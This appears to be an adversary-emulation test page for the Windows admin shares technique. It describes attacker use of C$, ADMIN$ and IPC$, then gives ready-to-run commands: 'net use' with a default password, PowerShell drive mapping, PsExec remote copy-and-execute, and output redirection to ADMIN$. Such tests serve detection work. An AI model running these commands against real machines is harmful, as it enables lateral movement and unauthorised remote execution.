Windows systems have hidden network shares that are accessible only to administrators and provide the ability for remote file copy and other administrative functions. Example network shares includeC$,ADMIN$, andIPC$.Adversaries may use this technique in conjunction with administrator-level Valid Accounts to remotely access a networked system over server message block (SMB) (Citation: Wikipedia SMB) to interact with systems using remote procedure calls (RPCs), (Citation: TechNet RPC) transfer files, and run transferred binaries through remote Execution. Example execution techniques that rely on authenticated sessions over SMB/RPC are Scheduled Task, Service Execution, and Windows Management Instrumentation. Adversaries can also use NTLM hashes to access administrator shares on systems with Pass the Hash and certain configuration and patch levels. (Citation: Microsoft Admin Shares)
The Net utility can be used to connect to Windows admin shares on remote systems using
net usecommands with valid credentials. (Citation: Technet Net Use)
Connecting To Remote Shares
Supported Platforms: Windows
| Name | Description | Type | Default Value |
|---|---|---|---|
| share_name | Examples C$, IPC$, Admin$ | String | C$ |
| user_name | Username | String | DOMAIN\Administrator |
| password | Password | String | P@ssw0rd1 |
| computer_name | Target Computer Name | String | Target |
cmd.exe /c "net use \\#{computer_name}\#{share_name} #{password} /u:#{user_name}"
Map Admin share utilizing PowerShell
Supported Platforms: Windows
| Name | Description | Type | Default Value |
|---|---|---|---|
| share_name | Examples C$, IPC$, Admin$ | String | C$ |
| computer_name | Target Computer Name | String | Target |
| map_name | Mapped Drive Letter | String | g |
New-PSDrive -name #{map_name} -psprovider filesystem -root \\#{computer_name}\#{share_name}
Copies a file to a remote host and executes it using PsExec. Requires the download of PsExec from https://docs.microsoft.com/en-us/sysinternals/downloads/psexec.
Supported Platforms: Windows
| Name | Description | Type | Default Value |
|---|---|---|---|
| remote_host | Remote computer to receive the copy and execute the file | String | \localhost |
| command_path | File to copy and execute | Path | C:\Windows\System32\cmd.exe |
psexec.exe #{remote_host} -c #{command_path}
Executes a command, writing the output to a local Admin Share. This technique is used by post-exploitation frameworks.
Supported Platforms: Windows
| Name | Description | Type | Default Value |
|---|---|---|---|
| output_file | Remote computer to receive the copy and execute the file | String | output.txt |
| command_to_execute | Command to execute for output. | String | hostname |
cmd.exe /Q /c #{command_to_execute} 1> \\127.0.0.1\ADMIN$\#{output_file} 2>&1